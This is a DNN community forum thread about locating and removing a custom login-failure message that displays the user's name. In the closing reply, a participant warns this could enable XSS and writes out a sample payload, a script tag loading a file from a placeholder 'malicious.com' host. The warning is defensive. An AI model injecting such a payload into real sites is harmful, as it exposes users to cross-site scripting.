Products

Solutions

Resources

Partners

Community

Blog

About

QA

Ideas Test

New Community Website

Ordinarily, you'd be at the right spot, but we've recently launched a brand new community website... For the community, by the community.

Yay... Take Me to the Community!

Welcome to the DNN Community Forums, your preferred source of online community support for all things related to DNN.
In order to participate you must be a registered DNNizen

HomeHomeUsing DNN Platf...Using DNN Platf...Language and In...Language and In...Need to change authentication failure messageNeed to change authentication failure message
Previous
 
Next
New Post
5/7/2019 7:04 PM
 

Our software uses DNN as its front end.  We are currently on version 8.0.2.  We deploy in secure environments and there is an issue with the fact that the current authentication failure message displayed to the user contains their username.  I have tried to figure out where to go to change this message, but after looking through resource files and aspx files I've had no luck.

If someone could point me to where this string is defined, I would greatly appreciate it.

Thanks,

 Kevin

 
New Post
5/8/2019 1:45 AM
 
Kevin,

this is not the DNN standard message, which is "Login Failed. Please remember that passwords are case sensitive". Are you using a different or custom authentication provider?

Happy DNNing!
Michael

Michael Tobisch
DNN★MVP

dnn-Connect.org - The most vibrant community around the DNN-platform
 
New Post
5/8/2019 10:44 AM
 
Hi Michael, thanks for the reply.  We are using a custom authentication provider that uses our software's API to authenticate users.  I understand the message might be defined somewhere in that provider, but I've been unable to find where.  It doesn't seem to be in resource files or code.
 
New Post
5/8/2019 10:59 AM
 

Okay, you've got me on the right track now.  The reason I couldn't find that message is that it's coming from deeper in our software than the authentication provider.  Thanks for the assistance!

Kevin



 
New Post
5/9/2019 2:25 AM
 

Kevin,

great that you found it.

You should really get rid of the message, as it could be an entry point for XSS attacks. Imagine someone enters

<script src="http://www.malicious.com/scripts/dosomethingbad.js" type="text/javascript"></script>

in the username field...

Happy DNNing!
Michael


Michael Tobisch
DNN★MVP

dnn-Connect.org - The most vibrant community around the DNN-platform
 
Previous
 
Next
HomeHomeUsing DNN Platf...Using DNN Platf...Language and In...Language and In...Need to change authentication failure messageNeed to change authentication failure message


These Forums are dedicated to discussion of DNN Platform and Evoq Solutions.

For the benefit of the community and to protect the integrity of the ecosystem, please observe the following posting guidelines:

  1. No Advertising. This includes promotion of commercial and non-commercial products or services which are not directly related to DNN.
  2. No vendor trolling / poaching. If someone posts about a vendor issue, allow the vendor or other customers to respond. Any post that looks like trolling / poaching will be removed.
  3. Discussion or promotion of DNN Platform product releases under a different brand name are strictly prohibited.
  4. No Flaming or Trolling.
  5. No Profanity, Racism, or Prejudice.
  6. Site Moderators have the final word on approving / removing a thread or post or comment.
  7. English language posting only, please.
What is Liquid Content?
Find Out
What is Liquid Content?
Find Out
What is Liquid Content?
Find Out